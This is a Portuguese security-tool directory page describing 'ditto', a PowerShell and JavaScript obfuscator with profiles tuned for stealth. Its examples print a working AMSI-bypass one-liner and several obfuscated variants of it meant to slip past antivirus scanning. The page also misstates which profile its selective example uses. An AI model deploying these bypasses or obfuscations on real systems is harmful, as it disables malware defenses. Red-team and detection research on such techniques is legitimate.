Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ditto — Ofusca scripts PowerShell e JavaScript usando análise baseada em tree-sitter, com múltiplos perfis de impostor configuráveis para furtividade, tamanho e dificuldade de engenharia reversa. | Kitploit
Ferramentas/GitHubGitHub/airbus-cert/ditto
Análise de CódigoEngenharia ReversaScripting e AutomaçãoAnálise de MalwareDesenvolvimento de Payloads
GitHubairbus-cert/ditto

ditto

Ofusca scripts PowerShell e JavaScript usando análise baseada em tree-sitter, com múltiplos perfis de impostor configuráveis para furtividade, tamanho e dificuldade de engenharia reversa.

Ver Repositório
252há 3 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ditto


Ofuscador de Powershell

Ditto é um ofuscador de Powershell e JavaScript baseado em tree-sitter-powershell e tree-sitter-javascript.

Uso pela Linha de Comando

Estrutura Básica do Comando

ditto-cli [opções]

Argumentos e Opções da CLI

Opção CurtaOpção LongaDescrição
-h--helpExibe informações de ajuda e sai.
-v--versionExibe informações de versão e sai.
-p --path Caminho para o arquivo de script a ser processado.
-i --impostor Perfil impostor a usar para ofuscação (não diferencia maiúsculas de minúsculas).
-L--listLista todos os perfis impostores disponíveis.
-t--timeMostra o tempo de computação gasto no processo de ofuscação.
-d <NÍVEL>--debug-level <NÍVEL>Nível de depuração. Opções: off, error, warn, info, debug, trace (Padrão: info).
-q--quietApenas gera o script ofuscado final, suprimindo todos os outros logs.

Linguagens Suportadas e Impostores

Cada linguagem vem equipada com Impostores distintos com tema de Pokémon. Um impostor é uma receita nomeada que encadeia várias passagens de ofuscação. Cada um favorece uma combinação diferente de técnicas, então o mesmo script ofuscado por dois impostores não se parece em nada. Escolha aquele cujo equilíbrio (furtividade, tamanho, legibilidade, dificuldade de engenharia reversa) atenda às suas necessidades.

PowerShell

JavaScript

Liste todos os impostores disponíveis diretamente do seu shell:

root@kitploit:~
ditto-cli --list

Não hesite em adicionar o seu! E então você pode invocar o que quiser.

Exemplos

Transformação PowerShell (Impostor Ivysaur)

Script PowerShell Original:

root@kitploit:~
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)

Comando de Ofuscação:

root@kitploit:~
ditto-cli --path test.ps1 --impostor ivysaur

Saída Ofuscada:

root@kitploit:~
${Set-mK6} = 1; ${Add-xjQ} = 12; ${Remove-ScJ} = 8; ${Find-V7v} = 7; ${Get-wCX} = 4; ${Set-JEp} = 9; ${Add-3eV} = 16; ${Remove-pIQ} = 52; ${Find-OHR} = 24; ${Get-r4u} = 9076; ${Set-t49} = 89; ${Add-Qvs} = 87; ${Remove-qwO} = 49; ${Find-SMs} = 122; ${Get-wUj} = 97; ${Set-Ox3} = 86; ${Add-VQ5} = 78; ${Remove-EeM} = 108; ${Find-gzG} = 99; ${Get-LGX} = 51; ${Set-X5g} = 112; ${Add-GD5} = 98; ${Remove-aho} = 50; ${Find-3Zs} = 61; ${Get-ihU} = 85; ${Set-nKM} = 100; ${Add-GWd} = 71; ${Remove-Tvm} = 116; ${Find-7ba} = 76; ${Get-oeb} = 107; ${Set-Vxt} = 104; ${Add-rmz} = 109; ${Remove-Fsk} = 70; ${Find-jz5} = 110; ${Get-2TD} = 90; ${Set-TIQ} = 81; ${Add-Ru7} = 117; ${Remove-4HR} = 88; ${Find-T8S} = 48; ${Get-n8s} = 118; ${Set-mmg} = 105; ${Add-PZ1} = 53; ${Remove-xzI} = 66; ${Find-LRq} = 82; ${Get-MFU} = 72; ${Set-W0e} = 77; ${Add-bvf} = 84; ${Remove-3nx} = 57; ${Find-e43} = 106; ${Get-88G} = 119; $f8XP9 = [System.Runtime.InteropServices.Marshal]; $ifXoW = [Ref]; $lgnLf = [System.Text.Encoding]; $Knr3E = [System.Convert]; ${Set-cfudY9iG} = -join 'labolGHcollA'[-${Set-mK6}..-${Add-xjQ}]; ${Add-q3RPK0Xu} = -join 'ylbmessA'[-${Set-mK6}..-${Remove-ScJ}]; ${Remove-50AhxHbh} = -join 'epyTteG'[-${Set-mK6}..-${Find-V7v}]; ${Find-VOSaUhQS} = -join '8FTU'[-${Set-mK6}..-${Get-wCX}]; ${Get-w0xewYE7} = -join 'gnirtSteG'[-${Set-mK6}..-${Set-JEp}]; ${Set-2rZQYi7O} = -join 'gnirtS46esaBmorF'[-${Set-mK6}..-${Add-3eV}]; ${Add-nottCZwE} = -join '=MHbpRXVpNXbB5ibvlGdh12b0VXQuQnbl1WZnFmbh1kLtVGdzl3U'[-${Set-mK6}..-${Remove-pIQ}]; ${Remove-b45sz9Zn} = -join 'dleiFteG'[-${Set-mK6}..-${Remove-ScJ}]; ${Find-mUeEbv73} = -join '==wYpRXY0NFLjlGbiVHUu9mT'[-${Set-mK6}..-${Find-OHR}]; ${Get-hbkDceRb} = -join 'eulaVteS'[-${Set-mK6}..-${Remove-ScJ}]; ${Set-1zjqeqJt} = -join '=QHelRnbvNUaz1WY'[-${Set-mK6}..-${Add-3eV}]; $mem = $f8XP9::${Set-cfudY9iG}(${Get-r4u});$ifXoW.${Add-q3RPK0Xu}.${Remove-50AhxHbh}(($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(${Add-nottCZwE})))).${Remove-b45sz9Zn}(($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(([char]${Set-t49} + [char]${Add-Qvs} + [char]${Remove-qwO} + [char]${Find-SMs} + [char]${Get-wUj} + [char]${Set-Ox3} + [char]${Add-VQ5} + [char]${Remove-EeM} + [char]${Find-gzG} + [char]${Get-LGX} + [char]${Add-VQ5} + [char]${Set-X5g} + [char]${Add-GD5} + [char]${Remove-aho} + [char]${Remove-pIQ} + [char]${Find-3Zs})))), ($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(${Find-mUeEbv73})))).${Get-hbkDceRb}($null, $null);$ifXoW.${Add-q3RPK0Xu}.${Remove-50AhxHbh}(($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(([char]${Get-ihU} + [char]${Get-LGX} + [char]${Remove-EeM} + [char]${Find-SMs} + [char]${Set-nKM} + [char]${Add-GWd} + [char]${Set-Ox3} + [char]${Remove-Tvm} + [char]${Find-7ba} + [char]${Get-oeb} + [char]${Remove-qwO} + [char]${Set-Vxt} + [char]${Add-GD5} + [char]${Add-rmz} + [char]${Remove-Fsk} + [char]${Find-jz5} + [char]${Get-2TD} + [char]${Add-Qvs} + [char]${Remove-qwO} + [char]${Remove-EeM} + [char]${Add-GD5} + [char]${Find-jz5} + [char]${Set-TIQ} + [char]${Add-Ru7} + [char]${Set-TIQ} + [char]${Remove-4HR} + [char]${Set-Ox3} + [char]${Find-T8S} + [char]${Add-GD5} + [char]${Remove-aho} + [char]${Remove-qwO} + [char]${Set-Vxt} + [char]${Set-nKM} + [char]${Add-GWd} + [char]${Remove-EeM} + [char]${Get-n8s} + [char]${Add-GD5} + [char]${Set-mmg} + [char]${Add-PZ1} + [char]${Remove-xzI} + [char]${Add-GD5} + [char]${Remove-4HR} + [char]${Add-VQ5} + [char]${Set-X5g} + [char]${Set-Ox3} + [char]${Remove-4HR} + [char]${Find-LRq} + [char]${Set-X5g} + [char]${Add-GD5} + [char]${Get-MFU} + [char]${Set-W0e} + [char]${Find-3Zs}))))).${Remove-b45sz9Zn}(($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(${Set-1zjqeqJt}))), ($lgnLf::${Find-VOSaUhQS}.${Get-w0xewYE7}($Knr3E::${Set-2rZQYi7O}(([char]${Add-bvf} + [char]${Add-rmz} + [char]${Remove-3nx} + [char]${Add-Ru7} + [char]${Get-ihU} + [char]${Get-MFU} + [char]${Set-Ox3} + [char]${Set-mmg} + [char]${Add-GD5} + [char]${Add-GWd} + [char]${Remove-EeM} + [char]${Find-e43} + [char]${Find-7ba} + [char]${Remove-Fsk} + [char]${Add-VQ5} + [char]${Find-T8S} + [char]${Set-t49} + [char]${Remove-4HR} + [char]${Find-LRq} + [char]${Set-X5g} + [char]${Set-t49} + [char]${Get-88G} + [char]${Find-3Zs} + [char]${Find-3Zs}))))).${Get-hbkDceRb}($null, [IntPtr]$mem)

Transformação JavaScript (Impostor Tinkatuff)

Script JS Original:

root@kitploit:~
function greet(user) {
    console.log("Hello, " + user + "!");
}

greet("World");

Comando de Ofuscação:

root@kitploit:~
ditto-cli --path test.js --impostor Tinkatuff

Saída Ofuscada:

root@kitploit:~
function \u0067\u0072\u0065e\u0074(\u0075\u0073\u0065\u0072) {
    \u0063\u006F\u006E\u0073\u006Fle[\u0061\u0074\u006F\u0062((\u0053\u0074r\u0069\u006E\u0067('\x62\u0047') + '\x39\x52\u{00000039}h\u0041\u0062\u{000037}\u003739\x6E\u{0000033}\u0036n'.\u0072\u0065\u0070\u006C\u0061c\u0065\u0041l\u006C(/R9hAb\d{3}9n36/g, '')))](de\u0063\u006F\u0064\u0065\u0055\u0052I\u0043o\u006Dp\u006F\u006E\u0065n\u0074((\u0053\u0074\u0072\u0069\u006E\u0067.\u0072\u0061\u0077`%48` + '\u{00000025}\x0D\n'.\u0074\u0072im\u0045\u006E\u0064() + ['6\u{000035}', '\x25'].\u006Aoi\u006E('') + '\x36'.\u0074\u006F\u0053\u0074\u0072i\u006E\u0067() + '\u{0000043}%\u0036' + ''.\u006C\u0069n\u006B('C\u0025\x36').\u0073\u006C\u0069\u0063e(9, -6) + new \u0053\u0074\u0072\u0069\u006E\u0067('\u0046\u0025').\u0076\u0061\u006C\u0075\u0065O\u0066() + '\r\u{000000A}\u0032C\x25\u{00000D}\t'.\u0074\u0072\u0069\u006D() + '20'.\u0074r\u0069\u006D\u0045\u006E\u0064())) + \u0075\u0073\u0065\u0072 + \u0064\u0065c\u006F\u0064\u0065\u0055\u0052I((\u0053\u0074r\u0069n\u0067.r\u0061\u0077`%` + '\n\u0020\u{00000020}\x321'.\u0074\u0072\u0069\u006D\u0053tar\u0074())));
}

\u0067\u0072eet(\u0064\u0065c\u006F\u0064\u0065\u0055RI\u0043\u006Fm\u0070\u006Fn\u0065\u006E\u0074(('\u{0000025}\u{0000035}' + '\u{00000037}\u{00025}\n\x0A\u0009\u000A'.t\u0072\u0069\u006D\u0045n\u0064() + '6\u0046%' + \u0053\u0074\u0072\u0069\u006E\u0067.\u0066\u0072\u006F\u006DCh\u0061\u0072\u0043\u006Fd\u0065(55) + '\u{000032}'.\u0062\u0069\u0067().sl\u0069\u0063\u0065(5, -6) + \u0053\u0074\u0072\u0069\u006E\u0067.\u0072\u0061w`%6` + '\u{000043}' + \u0053\u0074\u0072\u0069\u006E\u0067.\u0072\u0061\u0077`%6` + '4')));

Ofuscação seletiva com Ditto

O impostor Ditto não ofusca o arquivo inteiro. Ele procura comentários de diretiva na forma # ditto(<engine>) e aplica o engine nomeado à única instrução logo após o comentário. Todo o resto é deixado intacto, e o comentário de diretiva em si é removido da saída. Isso é útil quando você quer apenas esconder partes sensíveis de um script, ou misturar vários engines em um único arquivo.

Script PowerShell Original:

root@kitploit:~
Write-Host "starting"

# ditto(pikachu)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)

Write-Host "done"

Comando de Ofuscação:

root@kitploit:~
ditto-cli --path test.ps1 --impostor ditto

Saída Ofuscada:

root@kitploit:~
Write-Host "starting"

$WRL6c=109;$DDjV=56;$pjWqV8=86;$r8cnDa=108;$wAD=101;$xtYSTM=50;$IHnFn=51;$787F0=122;$qWcmH0=65;$LgjuIE=77;$ial=52;$kVfXz=103;$gI9H6=104;$E3qM=97;$4Tr4=105;$empCP=117;$KA4XB=89;$TeXxjO=53;$t7IyYw=54;$ogg=114;$pDD=57;$dQXaf=81;$iTBnE=61;$IBf=48;$GUy=71;$cbVM=110;$biGF=85;$Z7Pn=106;$vcF=87;$oqzy3=72;$37C=118;$suPWLN=112;$1Ywq0M=83;$KI9h=119;$B3fd=70;$IScvzV=90;$oveAB=88;$p6TMv=84;$zj7E=98;$wUzL=111;$ToF=107;$Sd0Ozk=100;$AtZ=49;$qeyQOw=121;$NAX=115;$QsySk=82;$Zqk=66;$QYl36=78;$LHhAV=76;$DJp=116;$Rz89sj=([char]$KA4XB+[char]$vcF+[char]$AtZ+[char]$787F0+[char]$E3qM+[char]$biGF+[char]$r8cnDa+[char]$empCP+[char]$E3qM+[char]$oveAB+[char]$QsySk+[char]$GUy+[char]$KA4XB+[char]$vcF+[char]$r8cnDa+[char]$NAX+[char]$IScvzV+[char]$vcF+[char]$dQXaf+[char]$iTBnE);$TNP=([char]$qWcmH0+[char]$NAX+[char]$NAX+[char]$wAD+[char]$WRL6c+[char]$zj7E+[char]$r8cnDa+[char]$qeyQOw);$rF2B=([char]$biGF+[char]$p6TMv+[char]$B3fd+[char]$DDjV);$0xJaev=([char]$GUy+[char]$wAD+[char]$DJp+[char]$p6TMv+[char]$qeyQOw+[char]$suPWLN+[char]$wAD);$vpg=([char]$B3fd+[char]$ogg+[char]$wUzL+[char]$WRL6c+[char]$Zqk+[char]$E3qM+[char]$NAX+[char]$wAD+[char]$t7IyYw+[char]$ial+[char]$1Ywq0M+[char]$DJp+[char]$ogg+[char]$4Tr4+[char]$cbVM+[char]$kVfXz);$ISW=([char]$p6TMv+[char]$WRL6c+[char]$pDD+[char]$empCP+[char]$biGF+[char]$oqzy3+[char]$pjWqV8+[char]$4Tr4+[char]$zj7E+[char]$GUy+[char]$r8cnDa+[char]$Z7Pn+[char]$LHhAV+[char]$B3fd+[char]$QYl36+[char]$IBf+[char]$KA4XB+[char]$oveAB+[char]$QsySk+[char]$suPWLN+[char]$KA4XB+[char]$KI9h+[char]$iTBnE+[char]$iTBnE);$wiiSIm=([char]$biGF+[char]$IHnFn+[char]$r8cnDa+[char]$787F0+[char]$Sd0Ozk+[char]$GUy+[char]$pjWqV8+[char]$DJp+[char]$LHhAV+[char]$ToF+[char]$AtZ+[char]$gI9H6+[char]$zj7E+[char]$WRL6c+[char]$B3fd+[char]$cbVM+[char]$IScvzV+[char]$vcF+[char]$AtZ+[char]$r8cnDa+[char]$zj7E+[char]$cbVM+[char]$dQXaf+[char]$empCP+[char]$dQXaf+[char]$oveAB+[char]$pjWqV8+[char]$IBf+[char]$zj7E+[char]$xtYSTM+[char]$AtZ+[char]$gI9H6+[char]$Sd0Ozk+[char]$GUy+[char]$r8cnDa+[char]$37C+[char]$zj7E+[char]$4Tr4+[char]$TeXxjO+[char]$Zqk+[char]$zj7E+[char]$oveAB+[char]$QYl36+[char]$suPWLN+[char]$pjWqV8+[char]$oveAB+[char]$QsySk+[char]$suPWLN+[char]$zj7E+[char]$oqzy3+[char]$LgjuIE+[char]$iTBnE);$en3=([char]$GUy+[char]$wAD+[char]$DJp+[char]$B3fd+[char]$4Tr4+[char]$wAD+[char]$r8cnDa+[char]$Sd0Ozk);$rlIe=([char]$1Ywq0M+[char]$wAD+[char]$DJp+[char]$pjWqV8+[char]$E3qM+[char]$r8cnDa+[char]$empCP+[char]$wAD);$lmq=([char]$GUy+[char]$wAD+[char]$DJp+[char]$1Ywq0M+[char]$DJp+[char]$ogg+[char]$4Tr4+[char]$cbVM+[char]$kVfXz);${NBX}=[Ref];${Q6V}=[System.Text.Encoding];${93J9}=[System.Convert];${NBX}.$TNP.$0xJaev((${Q6V}::$rF2B.$lmq(${93J9}::$vpg($wiiSIm)))).$en3((${Q6V}::$rF2B.$lmq(${93J9}::$vpg($Rz89sj))), (${Q6V}::$rF2B.$lmq(${93J9}::$vpg($ISW)))).$rlIe($null, $true)

Write-Host "done"

Apenas a linha após # ditto(ivysaur) é ofuscada (com o engine Ivysaur); as duas chamadas Write-Host permanecem como estão.

Compilando a partir do código-fonte

  1. Clone o repositório
  2. Instale rust com cargo
  3. Compile o projeto
root@kitploit:~
cargo build --release --bin ditto-cli  

Após a compilação, você encontrará o binário em ./target/release/

Executando a partir do código-fonte

  1. Clone o repositório
  2. Instale rust com cargo
  3. Execute o projeto
root@kitploit:~
cargo run --release --bin ditto-cli -- {args vão aqui}
Baixar ferramenta
ImpostorO que faz
PikachuO mascote versátil. Converte literais em strings estáticas, reescreve cmdlets e membros de tipos como strings, codifica strings em Base64, divide inteiros com módulo/hexlify inline e renomeia variáveis aleatoriamente. Um padrão equilibrado.
BulbasaurIniciante de nível básico. Reescreve strings/cmdlets/membros, codificação Base64, nomes de variáveis aleatórios e inteiros reconstruídos via truque de módulo reverso. Leve e razoavelmente legível.
IvysaurA evolução do Bulbasaur. Mesma receita base, mas as variáveis são nomeadas após verbos do PowerShell (${Set-...}, ${Add-...}, ${Remove-...}) para se misturar com código legítimo, além de hexlify inline e inteiros com módulo reverso.
CharizardO peso pesado. Strings estáticas, Base64, módulo/hexlify inline aleatorizado, membro-como-string, inteiros com módulo reverso e nomes e tipos de variáveis aleatorizados empilhados para ofuscação agressiva.
AlakazamO cérebro matemático. Pré-computa cada booleano e inteiro em expressões aritméticas, quebra expressões de invocação e transforma cmdlets, membros e tipos em strings. Produz saída densa e cheia de expressões.
OnixO especialista em arrays. Armazena tokens em arrays constantes, embaralha-os, aplica hexlify via foreach e reconstrói cada inteiro através de aritmética XOR/soma avaliada em tempo de execução.
EeveeO renomeador. Renomeia aleatoriamente todas as funções, parâmetros e variáveis, reescreve cmdlets/membros como strings e atribui nomes estilo UUID e estilo verbo com mascaramento de curingas. Focado em ofuscação de identificadores.
DittoO imitador — um meta-impostor. Em vez de transformar o arquivo inteiro, ele escaneia o código-fonte em busca de comentários # ditto(<engine>) e aplica o engine nomeado apenas à instrução que segue imediatamente o comentário. Isso permite misturar impostores dentro de um único script. Veja Ofuscação seletiva com Ditto.
ImpostorO que faz
TinkatuffO padrão bem equilibrado. Reescreve acessos a membros como subscritos, ocasionalmente converte expressões em switch/if-else, transforma números em expressões matemáticas e codifica/divide/escapa strings e identificadores. Bom equilíbrio entre cobertura e tamanho.
UnownA cifra de símbolos. Codifica números, strings, booleanos, especiais e objetos padrão com truques estilo JSFuck e renomeia identificadores usando apenas $ e _. A saída é quase ilegível.
Metagross"Espera, é tudo números?" Transforma strings em fromCharCode, reescreve cada número como uma expressão e renomeia todos os identificadores para nomes parecidos com números. A saída é quase inteiramente dígitos.
WailordA baleia. Produz uma saída massiva (razão média de expansão ~4643x). Use apenas em scripts pequenos — ele empilha identificadores com nomes de bolhas, divisão de strings, números JSFuck e transformações de arrays.
ClefableO apostador. Escolhe aleatoriamente entre todas as passagens disponíveis, então você obtém uma saída comparativamente "pequena" que ainda carrega todo tipo de proteção. Um engenheiro reverso tem que lidar com todas as passagens possíveis. Como as passagens são escolhidas aleatoriamente e podem interferir, talvez seja necessário executá-lo algumas vezes.
CofagrigusO túmulo. Renomeia identificadores com nomes de hieróglifos egípcios, codifica strings, reescreve números como expressões e aplica transformações de "maldição" em strings/números. Sombrio, denso e difícil de ler.